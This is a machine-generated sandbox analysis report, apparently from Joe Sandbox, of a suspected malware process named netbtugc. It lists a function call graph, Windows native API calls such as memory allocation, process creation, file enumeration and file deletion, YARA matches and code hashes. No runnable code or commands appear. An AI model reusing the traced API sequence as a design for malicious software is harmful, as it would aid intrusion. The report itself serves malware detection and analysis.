93729->93730 93732 2c794db 93729->93732 93731 2c7955b NtAllocateVirtualMemory 93730->93731 93731->93728 93732->93728 93733 2c79040 93734 2c790f7 93733->93734 93736 2c7906f 93733->93736 93735 2c7910d NtCreateFile 93734->93735 93737 2c787c0 93738 2c7884f 93737->93738 93739 2c787eb 93737->93739 93742 34b2e00 LdrInitializeThunk 93738->93742 93740 2c78880 93742->93740 93743 2c78940 93744 2c7895a 93743->93744 93747 34b2d10 LdrInitializeThunk 93744->93747 93745 2c78982 93747->93745 93750 2c59ed3 93751 2c59eb7 CreateThread 93750->93751 93754 2c59edb 93750->93754 93753 2c5a5da 93754->93753 93755 2c7b040 93754->93755 93756 2c7b066 93755->93756 93761 2c54190 93756->93761 93758 2c7b072 93759 2c7b0ae 93758->93759 93764 2c755d0 93758->93764 93759->93753 93763 2c5419d 93761->93763 93768 2c63300 93761->93768 93763->93758 93765 2c75631 93764->93765 93767 2c7563e 93765->93767 93786 2c61b40 93765->93786 93767->93759 93769 2c6331a 93768->93769 93771 2c63333 93769->93771 93772 2c79d90 93769->93772 93771->93763 93773 2c79daa 93772->93773 93774 2c79dd9 93773->93774 93779 2c78990 93773->93779 93774->93771 93777 2c7b3d0 RtlFreeHeap 93778 2c79e4f 93777->93778 93778->93771 93780 2c789ad 93779->93780 93783 34b2b2a 93780->93783 93781 2c789d9 93781->93777 93784 34b2b3f LdrInitializeThunk 93783->93784 93785 34b2b31 93783->93785 93784->93781 93785->93781 93787 2c61b7b 93786->93787 93802 2c67ed0 93787->93802 93789 2c61b83 93790 2c61e50 93789->93790 93813 2c7b4b0 93789->93813 93790->93767 93792 2c61b99 93793 2c7b4b0 RtlAllocateHeap 93792->93793 93794 2c61baa 93793->93794 93795 2c7b4b0 RtlAllocateHeap 93794->93795 93796 2c61bbb 93795->93796 93800 2c61c49 93796->93800 93820 2c66a90 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 93796->93820 93798 2c645d0 LdrLoadDll 93799 2c61dff 93798->93799 93816 2c77f10 93799->93816 93800->93798 93803 2c67efc 93802->93803 93804 2c67dc0 2 API calls 93803->93804 93805 2c67f1f 93804->93805 93806 2c67f41 93805->93806 93807 2c67f29 93805->93807 93810 2c79340 NtClose 93806->93810 93811 2c67f5d 93806->93811 93808 2c79340 NtClose 93807->93808 93809 2c67f34 93807->93809 93808->93809 93809->93789 93812 2c67f53 93810->93812 93811->93789 93812->93789 93821 2c79660 93813->93821 93815 2c7b4cb 93815->93792 93817 2c77f72 93816->93817 93819 2c77f7f 93817->93819 93824 2c61e60 93817->93824 93819->93790 93820->93800 93822 2c7967d 93821->93822 93823 2c7968e RtlAllocateHeap 93822->93823 93823->93815 93840 2c681a0 93824->93840 93826 2c61e80 93827 2c623c0 93826->93827 93844 2c71130 93826->93844 93827->93819 93830 2c62092 93852 2c7c5a0 93830->93852 93832 2c61ed8 93832->93827 93847 2c7c470 93832->93847 93834 2c620a7 93836 2c620f4 93834->93836 93858 2c609b0 93834->93858 93836->93827 93837 2c609b0 LdrInitializeThunk 93836->93837 93862 2c68140 93836->93862 93837->93836 93838 2c68140 LdrInitializeThunk 93839 2c62245 93838->93839 93839->93836 93839->93838 93841 2c681ad 93840->93841 93842 2c681d3 93841->93842 93843 2c681cc SetErrorMode 93841->93843 93842->93826 93843->93842 93845 2c7b340 NtAllocateVirtualMemory 93844->93845 93846 2c71151 93845->93846 93846->93832 93848 2c7c486 93847->93848 93849 2c7c480 93847->93849 93850 2c7b4b0 RtlAllocateHeap 93848->93850 93849->93830 93851 2c7c4ac 93850->93851 93851->93830 93853 2c7c510 93852->93853 93854 2c7b4b0 RtlAllocateHeap 93853->93854 93856 2c7c56d 93853->93856 93855 2c7c54a 93854->93855 93857 2c7b3d0 RtlFreeHeap 93855->93857 93856->93834 93857->93856 93859 2c609b1 93858->93859 93866 2c795d0 93859->93866 93863 2c68153 93862->93863 93871 2c78890 93863->93871 93865 2c6817e 93865->93836 93867 2c795ed 93866->93867 93870 34b2b90 LdrInitializeThunk 93867->93870 93868 2c609d2 93868->93839 93870->93868 93872 2c7890e 93871->93872 93873 2c788bb 93871->93873 93876 34b2cf0 LdrInitializeThunk 93872->93876 93873->93865 93874 2c78933 93874->93865 93876->93874 93877 2c67190 93878 2c671a9 93877->93878 93885 2c671ff 93877->93885 93880 2c79340 NtClose 93878->93880 93878->93885 93879 2c67334 93881 2c671c7 93880->93881 93887 2c665c0 NtClose LdrInitializeThunk LdrInitializeThunk 93881->93887 93883 2c6730e 93883->93879 93889 2c66790 NtClose LdrInitializeThunk LdrInitializeThunk 93883->93889 93885->93879 93888 2c665c0 NtClose LdrInitializeThunk LdrInitializeThunk 93885->93888 93887->93885 93888->93883 93889->93879 93890 2c60f10 93891 2c60f2a 93890->93891 93892 2c645d0 LdrLoadDll 93891->93892 93893 2c60f45 93892->93893 93894 2c60f8a 93893->93894 93895 2c60f79 PostThreadMessageW 93893->93895 93895->93894 93896 2c7c4d0 93897 2c7b3d0 RtlFreeHeap 93896->93897 93898 2c7c4e5 93897->93898 93899 2c78290 93900 2c782aa 93899->93900 93901 2c782bb RtlDosPathNameToNtPathName_U 93900->93901 93902 2c75a10 93903 2c75a75 93902->93903 93904 2c75ab0 93903->93904 93907 2c71400 93903->93907 93906 2c75a92 93909 2c713b1 93907->93909 93908 2c71420 93909->93908 93910 2c79340 NtClose 93909->93910 93911 2c713ef 93910->93911 93911->93906 93918 2c5b6e0 93919 2c7b340 NtAllocateVirtualMemory 93918->93919 93920 2c5cd51 93919->93920 93921 2c6f820 93922 2c6f884 93921->93922 93923 2c66330 2 API calls 93922->93923 93925 2c6f9b7 93923->93925 93924 2c6f9be 93925->93924 93950 2c66440 93925->93950 93927 2c6fb63 93928 2c6fa3a 93928->93927 93929 2c6fb72 93928->93929 93954 2c6f600 93928->93954 93930 2c79340 NtClose 93929->93930 93932 2c6fb7c 93930->93932 93933 2c6fa76 93933->93929 93934 2c6fa81 93933->93934 93935 2c7b4b0 RtlAllocateHeap 93934->93935 93936 2c6faaa 93935->93936 93937 2c6fab3 93936->93937 93938 2c6fac9 93936->93938 93939 2c79340 NtClose 93937->93939 93963 2c6f4f0 CoInitialize 93938->93963 93941 2c6fabd 93939->93941 93942 2c6fad7 93966 2c78e00 93942->93966 93944 2c6fb52 93945 2c79340 NtClose 93944->93945 93946 2c6fb5c 93945->93946 93947 2c7b3d0 RtlFreeHeap 93946->93947 93947->93927 93948 2c6faf5 93948->93944 93949 2c78e00 LdrInitializeThunk 93948->93949 93949->93948 93951 2c66465 93950->93951 93970 2c78cb0 93951->93970 93955 2c6f61c 93954->93955 93956 2c645d0 LdrLoadDll 93955->93956 93958 2c6f637 93956->93958 93957 2c6f640 93957->93933 93958->93957 93959 2c645d0 LdrLoadDll 93958->93959 93960 2c6f70b 93959->93960 93961 2c645d0 LdrLoadDll 93960->93961 93962 2c6f768 93960->93962 93961->93962 93962->93933 93964 2c6f555 93963->93964 93965 2c6f5eb CoUninitialize 93964->93965 93965->93942 93967 2c78e1d 93966->93967 93975 34b2ac0 LdrInitializeThunk 93967->93975 93968 2c78e4d 93968->93948 93971 2c78cca 93970->93971 93974 34b2b80 LdrInitializeThunk 93971->93974 93972 2c664d9 93972->93928 93974->93972 93975->93968 93976 2c792a0 93977 2c79317 93976->93977 93978 2c792cb 93976->93978 93979 2c7932d NtDeleteFile 93977->93979 93985 2c71760 93986 2c7177c 93985->93986 93987 2c717a4 93986->93987 93988 2c717b8 93986->93988 93989 2c79340 NtClose 93987->93989 93990 2c79340 NtClose 93988->93990 93991 2c717ad 93989->93991 93992 2c717c1 93990->93992 93995 2c7b4f0 RtlAllocateHeap 93992->93995 93994 2c717cc 93995->93994 93996 2c70120 93997 2c70143 93996->93997 93998 2c645d0 LdrLoadDll 93997->93998 93999 2c70164 93998->93999 94005 2c65c30 94006 2c68140 LdrInitializeThunk 94005->94006 94007 2c65c60 94006->94007 94009 2c65c8c 94007->94009 94010 2c680c0 94007->94010 94011 2c68104 94010->94011 94012 2c68125 94011->94012 94017 2c78660 94011->94017 94012->94007 94014 2c68115 94015 2c68131 94014->94015 94016 2c79340 NtClose 94014->94016 94015->94007 94016->94012 94018 2c78688 94017->94018 94019 2c786da 94017->94019 94018->94014 94022 34b4570 LdrInitializeThunk 94019->94022 94020 2c786ff 94020->94014 94022->94020 94023 2c6c5f0 94025 2c6c619 94023->94025 94024 2c6c71c 94025->94024 94026 2c6c6c0 FindFirstFileW 94025->94026 94026->94024 94027 2c6c6db 94026->94027 94028 2c6c703 FindNextFileW 94027->94028 94028->94027 94029 2c6c715 FindClose 94028->94029 94029->94024 94030 2c67370 94031 2c673df 94030->94031 94032 2c67388 94030->94032 94032->94031 94034 2c6b290 94032->94034 94035 2c6b2b6 94034->94035 94036 2c6b4dd 94035->94036 94061 2c79740 94035->94061 94036->94031 94038 2c6b32f 94038->94036 94039 2c7c5a0 2 API calls 94038->94039 94040 2c6b34e 94039->94040 94040->94036 94041 2c6b41c 94040->94041 94042 2c78990 LdrInitializeThunk 94040->94042 94043 2c65bb0 LdrInitializeThunk 94041->94043 94045 2c6b438 94041->94045 94044 2c6b3b0 94042->94044 94043->94045 94044->94041 94047 2c6b3b9 94044->94047 94049 2c6b4c5 94045->94049 94067 2c78500 94045->94067 94046 2c6b404 94050 2c68140 LdrInitializeThunk 94046->94050 94047->94036 94047->94046 94048 2c6b3e5 94047->94048 94064 2c65bb0 94047->94064 94082 2c74760 LdrInitializeThunk 94048->94082 94051 2c68140 LdrInitializeThunk 94049->94051 94055 2c6b412 94050->94055 94056 2c6b4d3 94051->94056 94055->94031 94056->94031 94057 2c6b49c 94072 2c785b0 94057->94072 94059 2c6b4b6 94077 2c78710 94059->94077 94062 2c7975d 94061->94062 94063 2c7976e CreateProcessInternalW 94062->94063 94063->94038 94065 2c78b60 LdrInitializeThunk 94064->94065 94066 2c65bee 94065->94066 94066->94048 94068 2c7857d 94067->94068 94069 2c7852b 94067->94069 94083 34b38d0 LdrInitializeThunk 94068->94083 94069->94057 94070 2c785a2 94070->94057 94073 2c7862a 94072->94073 94075 2c785d8 94072->94075 94084 34b4260 LdrInitializeThunk 94073->94084 94074 2c7864f 94074->94059 94075->94059 94078 2c7878a 94077->94078 94080 2c78738 94077->94080 94085 34b2ed0 LdrInitializeThunk 94078->94085 94079 2c787af 94079->94049 94080->94049 94082->94046 94083->94070 94084->94074 94085->94079 94086 2c6ad70 94091 2c6aa80 94086->94091 94088 2c6ad7d 94105 2c6a700 94088->94105 94090 2c6ad99 94092 2c6aaa5 94091->94092 94116 2c683a0 94092->94116 94095 2c6abf3 94095->94088 94097 2c6ac0a 94097->94088 94098 2c6ac01 94098->94097 94100 2c6acf7 94098->94100 94135 2c6a150 94098->94135 94102 2c6ad5a 94100->94102 94144 2c6a4c0 94100->94144 94103 2c7b3d0 RtlFreeHeap 94102->94103 94104 2c6ad61 94103->94104 94104->94088 94106 2c6a716 94105->94106 94109 2c6a721 94105->94109 94107 2c7b4b0 RtlAllocateHeap 94106->94107 94107->94109 94108 2c6a742 94108->94090 94109->94108 94110 2c683a0 GetFileAttributesW 94109->94110 94111 2c6aa52 94109->94111 94114 2c6a150 RtlFreeHeap 94109->94114 94115 2c6a4c0 RtlFreeHeap 94109->94115 94110->94109 94112 2c6aa6b 94111->94112 94113 2c7b3d0 RtlFreeHeap 94111->94113 94112->94090 94113->94112 94114->94109 94115->94109 94117 2c683bf 94116->94117 94118 2c683c6 GetFileAttributesW 94117->94118 94119 2c683d1 94117->94119 94118->94119 94119->94095 94120 2c73360 94119->94120 94121 2c7336e 94120->94121 94122 2c73375 94120->94122 94121->94098 94123 2c645d0 LdrLoadDll 94122->94123 94124 2c733a7 94123->94124 94125 2c733b6 94124->94125 94148 2c72e30 LdrLoadDll 94124->94148 94127 2c7b4b0 RtlAllocateHeap 94125->94127 94131 2c73564 94125->94131 94128 2c733cf 94127->94128 94129 2c7355a 94128->94129 94128->94131 94132 2c733eb 94128->94132 94130 2c7b3d0 RtlFreeHeap 94129->94130 94129->94131 94130->94131 94131->94098 94132->94131 94133 2c7b3d0 RtlFreeHeap 94132->94133 94134 2c7354e 94133->94134 94134->94098 94136 2c6a176 94135->94136 94149 2c6db60 94136->94149 94138 2c6a1e8 94140 2c6a36a 94138->94140 94141 2c6a206 94138->94141 94139 2c6a34f 94139->94098 94140->94139 94143 2c6a010 RtlFreeHeap 94140->94143 94141->94139 94154 2c6a010 94141->94154 94143->94140 94145 2c6a4e6 94144->94145 94146 2c6db60 RtlFreeHeap 94145->94146 94147 2c6a56d 94146->94147 94147->94100 94148->94125 94150 2c6db84 94149->94150 94151 2c6db91 94150->94151 94152 2c7b3d0 RtlFreeHeap 94150->94152 94151->94138 94153 2c6dbd4 94152->94153 94153->94138 94155 2c6a02d 94154->94155 94158 2c6dbf0 94155->94158 94157 2c6a133 94157->94141 94159 2c6dc14 94158->94159 94160 2c6dcbe 94159->94160 94161 2c7b3d0 RtlFreeHeap 94159->94161 94160->94157 94161->94160 94162 2c71af0 94163 2c71b09 94162->94163 94164 2c71b51 94163->94164 94167 2c71b91 94163->94167 94169 2c71b96 94163->94169 94165 2c7b3d0 RtlFreeHeap 94164->94165 94166 2c71b61 94165->94166 94168 2c7b3d0 RtlFreeHeap 94167->94168 94168->94169 94170 2c791b0 94171 2c79254 94170->94171 94173 2c791d8 94170->94173 94172 2c7926a NtReadFile 94171->94172 94174 2c6243c 94175 2c6244e 94174->94175 94176 2c623e9 94174->94176 94177 2c78990 LdrInitializeThunk 94176->94177 94178 2c62406 94177->94178 94181 2c793e0 94178->94181 94180 2c6241b 94182 2c7946f 94181->94182 94184 2c7940b 94181->94184 94186 34b2da0 LdrInitializeThunk 94182->94186 94183 2c794a0 94183->94180 94184->94180 94186->94183 94187 34b29f0 LdrInitializeThunk

                                                                                                  Executed Functions

                                                                                                  Function 02C59EE0 Relevance: 17.9, Strings: 14, Instructions: 396COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 248 2c59ee0-2c5a174 249 2c5a17e-2c5a182 248->249 250 2c5a184-2c5a1a1 249->250 251 2c5a1a3-2c5a1aa 249->251 250->249 252 2c5a1b1-2c5a1b8 251->252 253 2c5a1ef 252->253 254 2c5a1ba-2c5a1ed 252->254 255 2c5a1f6-2c5a206 253->255 254->252 255->255 256 2c5a208-2c5a212 255->256 257 2c5a223-2c5a22c 256->257 258 2c5a243-2c5a24a 257->258 259 2c5a22e-2c5a241 257->259 260 2c5a24c-2c5a262 258->260 261 2c5a26f-2c5a278 258->261 259->257 263 2c5a264-2c5a26a 260->263 264 2c5a26d 260->264 265 2c5a5cc-2c5a5d3 261->265 266 2c5a27e-2c5a285 261->266 263->264 264->258 268 2c5a5d5 call 2c7b040 265->268 269 2c5a647-2c5a651 265->269 267 2c5a290-2c5a297 266->267 272 2c5a2d6-2c5a2e0 267->272 273 2c5a299-2c5a2d4 267->273 277 2c5a5da-2c5a5e4 268->277 270 2c5a662-2c5a66b 269->270 274 2c5a682-2c5a68c 270->274 275 2c5a66d-2c5a680 270->275 278 2c5a2f1-2c5a2fa 272->278 273->267 275->270 280 2c5a5f5-2c5a5fc 277->280 281 2c5a310-2c5a323 278->281 282 2c5a2fc-2c5a30e 278->282 284 2c5a61f-2c5a626 280->284 285 2c5a5fe-2c5a61d 280->285 283 2c5a334-2c5a340 281->283 282->278 289 2c5a357-2c5a35e 283->289 290 2c5a342-2c5a355 283->290 284->269 287 2c5a628-2c5a645 284->287 285->280 287->284 292 2c5a360-2c5a388 289->292 293 2c5a38a-2c5a394 289->293 290->283 292->289 294 2c5a3a5-2c5a3af 293->294 295 2c5a3b1-2c5a3fb 294->295 296 2c5a3fd-2c5a407 294->296 295->294 298 2c5a418-2c5a421 296->298 299 2c5a437-2c5a441 298->299 300 2c5a423-2c5a435 298->300 302 2c5a452-2c5a45e 299->302 300->298 303 2c5a460-2c5a46d 302->303 304 2c5a46f-2c5a476 302->304 303->302 306 2c5a4ad-2c5a4b7 304->306 307 2c5a478-2c5a4ab 304->307 308 2c5a4c8-2c5a4d1 306->308 307->304 309 2c5a4d3-2c5a4dc 308->309 310 2c5a4e9-2c5a4f8 308->310 311 2c5a4e7 309->311 312 2c5a4de-2c5a4e4 309->312 313 2c5a53d-2c5a547 310->313 314 2c5a4fa-2c5a501 310->314 311->308 312->311 318 2c5a558-2c5a564 313->318 316 2c5a503-2c5a536 314->316 317 2c5a538 314->317 316->314 317->265 319 2c5a575-2c5a585 318->319 320 2c5a566-2c5a573 318->320 319->319 322 2c5a587-2c5a59b 319->322 320->318 323 2c5a5ac-2c5a5b5 322->323 324 2c5a5c7 323->324 325 2c5a5b7-2c5a5bd 323->325 324->261 326 2c5a5c5 325->326 327 2c5a5bf-2c5a5c2 325->327 326->323 327->326
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: !$'+$($;a$=5$>P$P_$Q6$]$m!$p$rj$~$4
                                                                                                  • API String ID: 0-4094942991
                                                                                                  • Opcode ID: d9399eb91db57d1fe24d83d058b51ad4fef82593eaf649015a8a75231398c0bd
                                                                                                  • Instruction ID: 419d412eb19c9d96c39a48c15accc88efa487bf306d4ce2eec622e22c305fc75
                                                                                                  • Opcode Fuzzy Hash: d9399eb91db57d1fe24d83d058b51ad4fef82593eaf649015a8a75231398c0bd
                                                                                                  • Instruction Fuzzy Hash: E422BEB0D05229CBDB68CF46C894BEDBBB1BB44308F5081D9C44DAB290DBB59AC9DF44
                                                                                                  Function 02C6C5F0 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 02C6C6D1
                                                                                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 02C6C70E
                                                                                                  • FindClose.KERNELBASE(?), ref: 02C6C719
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                                  • String ID:
                                                                                                  • API String ID: 3541575487-0
                                                                                                  • Opcode ID: e27007db34dca63fa6c18cd996db44c6af8d5fd8d230484b89e2362a9518ca5e
                                                                                                  • Instruction ID: 3751150d441b54c912ced3ff69f34a649fe0669e6f77d12d42d5cd36452c2b63
                                                                                                  • Opcode Fuzzy Hash: e27007db34dca63fa6c18cd996db44c6af8d5fd8d230484b89e2362a9518ca5e
                                                                                                  • Instruction Fuzzy Hash: 5631B8B19402497BDB20DFA0CC89FFF777D9F84745F184569B948A7180DBB0AB849BA0
                                                                                                  Function 02C79040 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • NtCreateFile.NTDLL(?,?,?,?,?,?,19868134,?,?,?,?), ref: 02C7913E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 823142352-0
                                                                                                  • Opcode ID: e7ded2df3684e34450af23f305653201a160ab6498b7c15dbf9814e2279eddc6
                                                                                                  • Instruction ID: ac7556f81782c94df48184f65dd7c704ef50aecdf9b9dd05887e56850e2475a6
                                                                                                  • Opcode Fuzzy Hash: e7ded2df3684e34450af23f305653201a160ab6498b7c15dbf9814e2279eddc6
                                                                                                  • Instruction Fuzzy Hash: 1531AFB5A11248ABCB14DF98D880EEEB7F9EF8C304F108219F909A7344D770A951CBA5
                                                                                                  Function 02C791B0 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • NtReadFile.NTDLL(?,?,?,?,?,?,19868134,?,?), ref: 02C79293
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FileRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 2738559852-0
                                                                                                  • Opcode ID: d7709514ee2329020b3af4891627251ef02a702f3bd03a5819cfb0ce790b7519
                                                                                                  • Instruction ID: 5804fc52a94ff71fe1baef667e0a5c77bf242e2abc5b08057c21a6fdad085bf4
                                                                                                  • Opcode Fuzzy Hash: d7709514ee2329020b3af4891627251ef02a702f3bd03a5819cfb0ce790b7519
                                                                                                  • Instruction Fuzzy Hash: 2A31C3B5A00648ABDB14DF98D880EEEB7F9EF8C314F148219F919A7240D770A911CFA5
                                                                                                  Function 02C794B0 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • NtAllocateVirtualMemory.NTDLL(02C61ED8,?,02C77F7F,00000000,00000004,00003000,?,?,?,?,?,02C77F7F,02C61ED8), ref: 02C79578
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 2167126740-0
                                                                                                  • Opcode ID: 2c6b097fc8b0a9e00e1c59ec0469c1ce528603cc43990c7808b7afa9a8d9d233
                                                                                                  • Instruction ID: 502f1d4643f88edfb1c673b1cc1f4c4004294b691adff46890b283ac0b7531df
                                                                                                  • Opcode Fuzzy Hash: 2c6b097fc8b0a9e00e1c59ec0469c1ce528603cc43990c7808b7afa9a8d9d233
                                                                                                  • Instruction Fuzzy Hash: EC2128B5A00248ABDB14DF98CC41FAFB7F9EF88304F104109FD08AB240D770A911CBA5
                                                                                                  Function 02C792A0 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: DeleteFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 4033686569-0
                                                                                                  • Opcode ID: 91fee05013acfa8afd33ad9a8294b478d0bc46498a74c6224e8d1f78887c54bc
                                                                                                  • Instruction ID: 7fcef1bdd2be07d8f6a8336f501eef4853dbc6a4fa8ce8a04514971a78fde089
                                                                                                  • Opcode Fuzzy Hash: 91fee05013acfa8afd33ad9a8294b478d0bc46498a74c6224e8d1f78887c54bc
                                                                                                  • Instruction Fuzzy Hash: 3F117071601718BBD720EB69CC05FEF73ADEF85714F004649FA09AB280E771AA05CBA5
                                                                                                  Function 02C79340 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02C79374
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Close
                                                                                                  • String ID:
                                                                                                  • API String ID: 3535843008-0
                                                                                                  • Opcode ID: 3dcf45a7d347465207fda5b43bd8a9fe00fc1fbb262f8247ff528aa46bd189d6
                                                                                                  • Instruction ID: 88cf979030d07b9884aa58ec62b7732e89da9a27e78cb53098f3beee4f9b4d4f
                                                                                                  • Opcode Fuzzy Hash: 3dcf45a7d347465207fda5b43bd8a9fe00fc1fbb262f8247ff528aa46bd189d6
                                                                                                  • Instruction Fuzzy Hash: 9EE08C362006147BD620EA5ACC41FDBB7ADDFC9764F004015FA0CA7241D7B1B9018BF8
                                                                                                  Function 034B4260 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 8d04d84e838be68654576a5c113e1066edd4d192985604e2d479b72decd03258
                                                                                                  • Instruction ID: a6feacda160a097db969814653134d2603ad160baad79644150fa3a65ad90367
                                                                                                  • Opcode Fuzzy Hash: 8d04d84e838be68654576a5c113e1066edd4d192985604e2d479b72decd03258
                                                                                                  • Instruction Fuzzy Hash: 6E90023561544412A580B15849845464005A7E0301B51C41AE0424994CCB3489566375
                                                                                                  Function 034B4570 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 884bf9e2b52e1e2b6ca6b52c818f4ee9edbb160b55b0b943901623f0855e6046
                                                                                                  • Instruction ID: b4c7784693907c7b0024a09f50475f26ca0fea72990eaf1d91aecec43b402637
                                                                                                  • Opcode Fuzzy Hash: 884bf9e2b52e1e2b6ca6b52c818f4ee9edbb160b55b0b943901623f0855e6046
                                                                                                  • Instruction Fuzzy Hash: 8B900265611144425580B15849044066005A7E1301391C51EA05549A0CC7388855A27D
                                                                                                  Function 034B2B00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: a12e63a5f6030ad262fc54094056b086d844805be82124872633e18a694de70a
                                                                                                  • Instruction ID: f88ede7dd5030964ff8521d3271ec36577b03b0b643c8b5f43a34e8cb9aec445
                                                                                                  • Opcode Fuzzy Hash: a12e63a5f6030ad262fc54094056b086d844805be82124872633e18a694de70a
                                                                                                  • Instruction Fuzzy Hash: 8990023521508C42E580B1584504A46001597D0305F51C41AA0064AD4DD7358D55B675
                                                                                                  Function 034B2B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
